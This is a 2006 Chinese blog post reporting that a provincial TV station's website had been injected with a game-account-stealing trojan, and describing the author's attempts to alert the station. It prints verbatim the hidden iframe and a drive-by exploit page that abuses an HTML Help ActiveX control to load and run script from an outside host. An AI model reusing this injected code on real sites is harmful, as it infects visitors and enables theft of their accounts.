欢迎光临~~
20年以来,与你常在!

贵州电视台网站中了传奇木马

今天从朋友博客上看到贵州电视台(http://www.gzstv.com)的链接,于是就点击进去看看。
没想到被人挂了木马上去,唉~~~贵州的網絡安全人才到哪儿去了?[face09]

电视台主页面
2006-04-24_140939-0.jpg

瑞星报警
2006-04-24_140939-1.jpg

挂马的代码
2006-04-24_140939-2.jpg

加入的代码

<IFRAME marginWidth=0 marginHeight=0 src="http://www.0451wu.com/bbs/Skins/Default/css/test/image.htm" frameBorder=0 width=0 height=0></IFRAME>

打开http://www.0451wu.com/bbs/Skins/Default/css/test/image.htm之后又会转到这个链接
http://www.0451wu.com/bbs/Skins/Default/css/test/windows.htm

再一查看,发现windows.htm的代码如下

<SCRIPTlanguage=VScriptsrc="young.gif"></SCRIPT><SCRIPTlanguage=VScriptsrc="young.css"></SCRIPT><HTML><BODY><divstyle="display:none"><OBJECTid="news728"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl"><PARAMname="Item1"value='command;/windows/help/apps.chm');</OBJECT><OBJECTid="news683"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl"><PARAMname="Item1"value='command;javascript:if(1==1){eval("document.write(\"<SCRIPTlanguage=JScriptsrc=\\\"http://www.0451wu.com/bbs/Skins/Default/css/test/young.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")}'></OBJECT></div><SCRIPT>news728.Click();f1=1+1;f1=f1+2;setTimeout("news683.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>

通过挂马的网站来看,看来是一名东北人搞的咯~~

后来发邮件给电视台的台长信箱,没有回音!!晕!

昨天打了电话给百姓关注,我想百姓的事他们都关注,自己的事更是应该关注!

今天打开网站,找不到那些木马代码了~~5.11

赞(0) 打赏
未经允许不得转载:正安一片瓦博客 » 贵州电视台网站中了传奇木马

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

支持站长,资源共享

支付宝扫一扫打赏

微信扫一扫打赏